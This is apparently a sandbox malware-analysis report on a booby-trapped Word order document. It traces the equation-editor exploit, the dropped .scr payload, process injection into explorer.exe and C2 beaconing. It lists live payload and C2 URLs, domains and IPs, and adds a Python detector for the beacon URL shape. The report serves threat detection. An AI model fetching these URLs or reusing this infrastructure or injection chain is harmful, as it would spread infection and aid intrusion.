Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

Source: Yara match :: File source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

Source: Yara match :: File source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C088EE EnterCriticalSection,RpcServerListen,LeaveCriticalSection, 14_2_00C088EE
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C0BC8E RpcServerUseProtseqW,RpcServerInqBindings,RpcEpRegisterW,RpcServerRegisterIfEx,RpcServerRegisterAuthInfoW,RpcEpUnregister,RpcServerUnregisterIfEx,RpcBindingVectorFree, 14_2_00C0BC8E
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C0FA9E RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle, 14_2_00C0FA9E
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C082A4 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,RpcMgmtStopServerListening, 14_2_00C082A4
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C0BA7B RpcBindingToStringBindingW,RpcStringBindingParseW,RpcBindingInqAuthClientW,RpcStringFreeW,RpcStringFreeW,RpcStringFreeW, 14_2_00C0BA7B
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C0B425 RpcEpUnregister,RpcServerUnregisterIfEx,RpcBindingVectorFree, 14_2_00C0B425
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C08188 EnterCriticalSection,EnterCriticalSection,LeaveCriticalSection,RpcMgmtWaitServerListen,EnterCriticalSection,LeaveCriticalSection, 14_2_00C08188
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C0AFB0 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcEpResolveBinding,RpcBindingSetOption,RpcMgmtInqServerPrincNameW,RpcBindingSetAuthInfoExW,RpcBindingSetAuthInfoW,RpcStringFreeW,RpcStringFreeW,RpcStringFreeW, 14_2_00C0AFB0
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C0AF1E RpcBindingFree, 14_2_00C0AF1E
MITRE ATT&CK Matrix

Techniques the report mapped, grouped by tactic. The number in parentheses is the count rendered beside the technique in the matrix; matrix cells that carry no count (the unmapped ATT&CK background) are not listed.

Execution: Native API (1); Shared Modules (1); Exploitation for Client Execution (33)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (612)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (31); Software Packing (1); Timestomp (1); DLL Side-Loading (1); Rootkit (1); Masquerading (11); Virtualization/Sandbox Evasion (41); Access Token Manipulation (1); Process Injection (612)
Credential Access: Credential API Hooking (1)
Discovery: System Time Discovery (1); File and Directory Discovery (1); System Information Discovery (214); Security Software Discovery (331); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); Remote System Discovery (1)
Collection: Archive Collected Data (11); Credential API Hooking (1)
Command and Control: Ingress Tool Transfer (5); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (114)
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no mapped techniques
Behavior Graph

Behavior Graph ID: 1462365; Sample: Order-1351125X.docx.doc; Startdate: 25/06/2024; Architecture: WINDOWS; Score: 100

Top-level network nodes: www.furryfriendsupply.store; universalmovies.top; 2 other IPs or domains
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

Process chain as drawn in the graph ("started" = child process, "injected" = code injected into an existing process; numbers in parentheses are the per-node counters of created registry values and files, in the order the graph shows them):

WINWORD.EXE (313, 54), started
  network: universalmovies.top 172.67.162.95, ports 443, 49166, 49167, CLOUDFLARENETUS United States
  dropped: C:\Users\user\...\universalmovies.top.url (MS); C:\Users\user\AppData\...\nelb.doc.url (MS); ~WRF{ED1BAB3C-10CE...8-52F8AAAAA7A9}.tmp (Composite)
  signatures: Microsoft Office launches external ms-search protocol handler (WebDAV); Office viewer loads remote template; Microsoft Office drops suspicious files
  └─ EQNEDT32.EXE (11), started
       network: 104.21.74.191, ports 443, 49173, CLOUDFLARENETUS United States; universalmovies.top
       dropped: C:\Users\user\AppData\Roaming\nelb82019.scr (PE32); C:\Users\user\AppData\Local\...\nelb[1].scr (PE32)
       signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
       └─ nelb82019.scr (2), started
            signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
            └─ nelb82019.scr, started
                 signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
                 └─ explorer.exe (6, 3), injected
                      network: www.wzxq.xyz; www.wirewizardselectric.net; 17 other IPs or domains
                      signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                      └─ wlanext.exe, started
                           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
                           └─ cmd.exe, started

Antivirus, Machine Learning and Genetic Malware Detection

Submitted sample:
Source | Detection | Scanner | Label
Order-1351125X.docx.doc | 32% | ReversingLabs | Document-Office.Exploit.CVE-2017-0199

Dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp | 100% | Avira | EXP/CVE-2018-0798.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr | 100% | Joe Sandbox ML | (no label)
C:\Users\user\AppData\Roaming\nelb82019.scr | 100% | Joe Sandbox ML | (no label)
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr | 37% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\nelb82019.scr | 37% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches
No Antivirus matches
URLs (the trailing characters on some entries, such as "0", "Referer:" or "j", are carried over from the memory strings the URLs were extracted from):
URL | Detection | Scanner | Label
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
http://www.nvzhuang1.netReferer: | 0% | Avira URL Cloud | safe
http://www.everslane.comReferer: | 0% | Avira URL Cloud | safe
http://www.mozilla.com0 | 0% | Avira URL Cloud | safe
http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.com | 100% | Avira URL Cloud | malware
https://universalmovies.top/nelb.scrj | 100% | Avira URL Cloud | phishing
http://www.onlynaturlpt.shop/btrd/ | 0% | Avira URL Cloud | safe
http://www.nvzhuang1.net | 0% | Avira URL Cloud | safe
https://support.mozilla.org | 0% | URL Reputation | safe
http://www.wirewizardselectric.netReferer: | 0% | Avira URL Cloud | safe
http://www.emeraldsurrogatefabric.comReferer: | 0% | Avira URL Cloud | safe
http://www.380747.net/btrd/www.emeraldsurrogatefabric.com | 0% | Avira URL Cloud | safe
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
http://www.ngbbvuhkm5.asiaReferer: | 0% | Avira URL Cloud | safe
http://www.cnoszirzbkaqz.comReferer: | 0% | Avira URL Cloud | safe
http://www.emeraldsurrogatefabric.com | 0% | Avira URL Cloud | safe
https://universalmovies.top/nelb.scr | 100% | Avira URL Cloud | malware
http://www.turbrun.com/btrd/www.wzxq.xyz | 0% | Avira URL Cloud | safe
http://www.texanboxes.com/btrd/ | 0% | Avira URL Cloud | safe
http://www.wzxq.xyz/btrd/www.texanboxes.com | 0% | Avira URL Cloud | safe
http://www.nvzhuang1.net/btrd/ | 0% | Avira URL Cloud | safe
http://www.cnoszirzbkaqz.com/btrd/ | 100% | Avira URL Cloud | malware
http://www.martline.website/btrd/ | 0% | Avira URL Cloud | safe
http://www.wzxq.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.turbrun.comReferer: | 0% | Avira URL Cloud | safe
http://www.outletivo.com/btrd/www.380747.net | 100% | Avira URL Cloud | malware
http://www.ngbbvuhkm5.asia/btrd/www.everslane.com | 0% | Avira URL Cloud | safe
http://www.outletivo.com/btrd/ | 100% | Avira URL Cloud | malware
https://universalmovies.top/nelb.scrll | 100% | Avira URL Cloud | phishing
http://www.outletivo.com/btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo | 100% | Avira URL Cloud | malware
http://www.texanboxes.com | 0% | Avira URL Cloud | safe
http://www.emeraldsurrogatefabric.com/btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo | 0% | Avira URL Cloud | safe
http://www.agriwithai.com | 0% | Avira URL Cloud |safe
http://www.furryfriendsupply.storeReferer: | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3 | 0% | Avira URL Cloud | safe
http://www.martline.website/btrd/www.cnoszirzbkaqz.com | 0% | Avira URL Cloud | safe
http://www.wzxq.xyz | 0% | Avira URL Cloud | safe
http://www.ngbbvuhkm5.asia/btrd/ | 0% | Avira URL Cloud | safe
http://www.cnoszirzbkaqz.com/btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo | 100% | Avira URL Cloud | malware
http://www.naddafornadda.com | 0% | Avira URL Cloud | safe
http://www.380747.netReferer: | 0% | Avira URL Cloud | safe
http://www.martline.website | 0% | Avira URL Cloud | safe
http://www.texanboxes.com/btrd/www.outletivo.com | 0% | Avira URL Cloud | safe
https://universalmovies.top/nelb.doc | 100% | Avira URL Cloud | phishing
http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asia | 100% | Avira URL Cloud | malware
http://www.outletivo.com | 100% | Avira URL Cloud | malware
http://www.piriform.com/ccleanerxe | 0% | Avira URL Cloud | safe
http://www.onlynaturlpt.shop/btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo | 0% | Avira URL Cloud | safe
http://www.turbrun.com | 0% | Avira URL Cloud | safe
https://universalmovies.top/nelb.scrula | 100% | Avira URL Cloud | phishing
http://www.wirewizardselectric.net/btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo | 0% | Avira URL Cloud | safe
http://www.emeraldsurrogatefabric.com/btrd/www.furryfriendsupply.store | 0% | Avira URL Cloud | safe
http://www.furryfriendsupply.store/btrd/www.agriwithai.com | 0% | Avira URL Cloud | safe
http://www.everslane.com/btrd/www.nvzhuang1.net | 0% | Avira URL Cloud | safe
http://www.agriwithai.com/btrd/ | 100% | Avira URL Cloud | malware
http://www.outletivo.comReferer: | 0% | Avira URL Cloud | safe
http://www.ngbbvuhkm5.asia | 0% | Avira URL Cloud | safe
http://www.onlynaturlpt.shopReferer: | 0% | Avira URL Cloud | safe
http://www.furryfriendsupply.store/btrd/ | 0% | Avira URL Cloud | safe
http://www.furryfriendsupply.store | 0% | Avira URL Cloud | safe
http://www.naddafornadda.comReferer: | 0% | Avira URL Cloud | safe
www.cnoszirzbkaqz.com/btrd/ | 100% | Avira URL Cloud | malware
http://www.wzxq.xyz/btrd/ | 0% | Avira URL Cloud | safe
http://www.naddafornadda.com/btrd/ | 0% | Avira URL Cloud | safe
http://www.martline.websiteReferer: | 0% | Avira URL Cloud | safe
http://www.texanboxes.com/btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo | 0% | Avira URL Cloud | safe
http://java.sun.com | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
https://universalmovies.top/ | 100% | Avira URL Cloud | phishing
https://universalmovies.top/nelb.scriiC: | 100% | Avira URL Cloud | phishing
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | 0% | Avira URL Cloud | safe
http://www.texanboxes.comReferer: | 0% | Avira URL Cloud | safe
http://www.everslane.com | 0% | Avira URL Cloud | safe
http://www.emeraldsurrogatefabric.com/btrd/ | 0% | Avira URL Cloud | safe
http://www.naddafornadda.com/btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo | 0% | Avira URL Cloud | safe
http://www.wirewizardselectric.net/btrd/ | 0% | Avira URL Cloud | safe
http://www.380747.net/btrd/ | 0% | Avira URL Cloud | safe
http://www.onlynaturlpt.shop | 0% | Avira URL Cloud | safe
http://www.piriform.com/ccleaner | 0% | Avira URL Cloud | safe
http://www.turbrun.com/btrd/ | 0% | Avira URL Cloud | safe
http://www.wirewizardselectric.net | 0% | Avira URL Cloud | safe
http://www.wirewizardselectric.net/btrd/www.martline.website | 0% | Avira URL Cloud | safe
http://www.380747.net/btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo | 0% | Avira URL Cloud | safe
http://www.cnoszirzbkaqz.com | 100% | Avira URL Cloud | malware
http://www.380747.net | 0% | Avira URL Cloud | safe
http://www.everslane.com/btrd/ | 0% | Avira URL Cloud | safe
https://google.com | 0% | Avira URL Cloud | safe
http://www.naddafornadda.com/btrd/www.turbrun.com | 0% | Avira URL Cloud | safe
http://www.agriwithai.comReferer: | 0% | Avira URL Cloud | safe
http://www.onlynaturlpt.shop/btrd/www.wirewizardselectric.net | 0% | Avira URL Cloud | safe
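Every C2 request URL in the list above has the same shape, http://www.<host>/btrd/?QF=<base64>&rr=F82tHBM8VV6X-vo: the path segment and the rr value are identical across all of the contacted domains, only the host and the QF payload change, and the evasion section shows the injected explorer.exe issuing the DNS queries and port-80 connects for those hosts. The block below is an added example and not part of the Joe Sandbox report: a Python matcher for that request shape, run over constructed EDR network-event lines (the line format is invented for this example; the two beacon URLs are copied from the report, the other lines are made up), grouping hits by the shared rr token. Treating rr as a token that stays constant for one infection is an assumption drawn from its recurrence in this report, not something the report states, and the concatenated entries in the list (.../btrd/www.naddafornadda.com) look like adjacent configuration strings run together in memory rather than real URLs, so the matcher deliberately does not match them.

```python
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import urlsplit

BEACON_PATH = "/btrd/"  # path segment present in every C2 request URL the report lists

# The raw query is matched with a regex instead of parse_qs so that '+' and '/'
# inside the base64 QF value are not URL-decoded into spaces.
_QUERY_RE = re.compile(r"^QF=(?P<qf>[A-Za-z0-9+/]+={0,2})&rr=(?P<rr>[A-Za-z0-9_-]+)$")
# Constructed event format for this example: ts client process method url status
_EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<process>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")

# Constructed input: the first two URLs are copied from the report, the rest is made up.
SAMPLE_EVENTS = """\
2024-06-25T10:01:02Z 10.0.0.15 explorer.exe GET http://www.outletivo.com/btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo 200
2024-06-25T10:01:03Z 10.0.0.15 explorer.exe GET http://www.cnoszirzbkaqz.com/btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo 404
2024-06-25T10:01:04Z 10.0.0.15 explorer.exe GET www.texanboxes.com/btrd/ 200
2024-06-25T10:01:05Z 10.0.0.22 chrome.exe GET https://support.mozilla.org/ 200
2024-06-25T10:01:06Z 10.0.0.22 chrome.exe GET http://shop.example/btrd/?QF=abc&rr=x 200
"""


def _split(url):
    # Memory strings in the report include scheme-less URLs such as www.cnoszirzbkaqz.com/btrd/
    return urlsplit(url if "://" in url else "http://" + url)


def classify_url(url, path=BEACON_PATH):
    """('beacon', rr, qf_bytes) for the full C2 request shape, ('path_only', None, None)
    when only the path segment matches, None for anything else."""
    parts = _split(url)
    if parts.path != path:
        return None
    m = _QUERY_RE.match(parts.query)
    if not m:
        return ("path_only", None, None)
    try:
        qf_bytes = base64.b64decode(m["qf"], validate=True)
    except (binascii.Error, ValueError):
        return ("path_only", None, None)   # alphabet fits but the value is not base64
    return ("beacon", m["rr"], qf_bytes)


def scan_events(text):
    """Return one dict per event whose URL carries the beacon path, in input order."""
    hits = []
    for line in text.splitlines():
        ev = _EVENT_RE.match(line.strip())
        if not ev:
            continue
        verdict = classify_url(ev["url"])
        if verdict is None:
            continue
        kind, rr, qf = verdict
        hits.append({
            "ts": ev["ts"], "client": ev["client"], "process": ev["process"],
            "host": _split(ev["url"]).hostname, "kind": kind, "rr": rr,
            "qf_len": None if qf is None else len(qf),
        })
    return hits


def pivot_by_rr(hits):
    """Group beacon hosts under the rr token they share. Assumption: rr is stable per
    infection, so one token spread over many hosts is the rotation seen in the report."""
    groups = defaultdict(set)
    for h in hits:
        if h["kind"] == "beacon":
            groups[h["rr"]].add(h["host"])
    return {rr: sorted(hosts) for rr, hosts in groups.items()}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['ts']} {h['process']} {h['host']} {h['kind']} rr={h['rr']} qf_len={h['qf_len']}")
    print(pivot_by_rr(hits))
```

The path-only verdict is kept separate on purpose: the report itself scores http://www.texanboxes.com/btrd/ as safe while the full QF/rr form on other hosts is scored malware, so a rule keyed on the path alone would fire on the bare directory requests as well. The QF value decodes to 52 bytes for both report URLs; nothing is claimed here about its contents.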
Domains and IPs (the Antivirus Detection column is empty for every entry and is omitted):
Name | IP | Active | Malicious | Reputation
wirewizardselectric.net | 15.197.148.33 | true | true | unknown
universalmovies.top | 172.67.162.95 | true | true | unknown
www.onlynaturlpt.shop | 104.21.89.47 | true | true | unknown
naddafornadda.com | 15.197.148.33 | true | true | unknown
cnoszirzbkaqz.com | 167.172.228.26 | true | true | unknown
texanboxes.com | 3.33.130.190 | true | true | unknown
www.380747.net | 156.241.141.214 | true | true | unknown
shops.myshopify.com | 23.227.38.74 | true | true | unknown
www.emeraldsurrogatefabric.com | 192.243.61.225 | true | true | unknown
www.outletivo.com | 5.149.161.103 | true | true | unknown
www.naddafornadda.com | unknown | unknown | true | unknown
www.cnoszirzbkaqz.com | unknown | unknown | true | unknown
www.wirewizardselectric.net | unknown | unknown | true | unknown
www.wzxq.xyz | unknown | unknown | true | unknown
www.texanboxes.com | unknown | unknown | true | unknown
www.turbrun.com | unknown | unknown | true | unknown
www.furryfriendsupply.store | unknown | unknown | true | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://universalmovies.top/nelb.scr | true | Avira URL Cloud: malware | unknown
http://www.outletivo.com/btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo | true | Avira URL Cloud: malware | unknown
http://www.emeraldsurrogatefabric.com/btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo | true | Avira URL Cloud: safe | unknown
http://www.cnoszirzbkaqz.com/btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo | true | Avira URL Cloud: malware | unknown
https://universalmovies.top/nelb.doc | true | Avira URL Cloud: phishing | unknown
http://www.onlynaturlpt.shop/btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo | true | Avira URL Cloud: safe | unknown
http://www.wirewizardselectric.net/btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo | true | Avira URL Cloud: safe | unknown
www.cnoszirzbkaqz.com/btrd/ | true | Avira URL Cloud: malware | unknown
http://www.texanboxes.com/btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo | true | Avira URL Cloud: safe | unknown
                                        http://www.naddafornadda.com/btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.380747.net/btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        unknown
URLs found in memory and binary data. Names that end in a fragment such as "Referer:", a stray "0" or a second domain appear to carry over adjacent strings from the dump; the URL proper ends before the fragment.
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.onlynaturlpt.shop/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.emeraldsurrogatefabric.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nvzhuang1.netReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://universalmovies.top/nelb.scrj | EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.wirewizardselectric.netReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.mozilla.com0 | explorer.exe, 0000000D.00000000.401767743.0000000002177000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923732332.0000000002177000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.380747.net/btrd/www.emeraldsurrogatefabric.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.everslane.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nvzhuang1.net | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cnoszirzbkaqz.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.emeraldsurrogatefabric.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ngbbvuhkm5.asiaReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wzxq.xyz/btrd/www.texanboxes.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.cnoszirzbkaqz.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nvzhuang1.net/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.texanboxes.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.turbrun.com/btrd/www.wzxq.xyz | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.martline.website/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.turbrun.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wzxq.xyzReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ngbbvuhkm5.asia/btrd/www.everslane.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://universalmovies.top/nelb.scrll | EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.outletivo.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.outletivo.com/btrd/www.380747.net | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.texanboxes.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.agriwithai.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
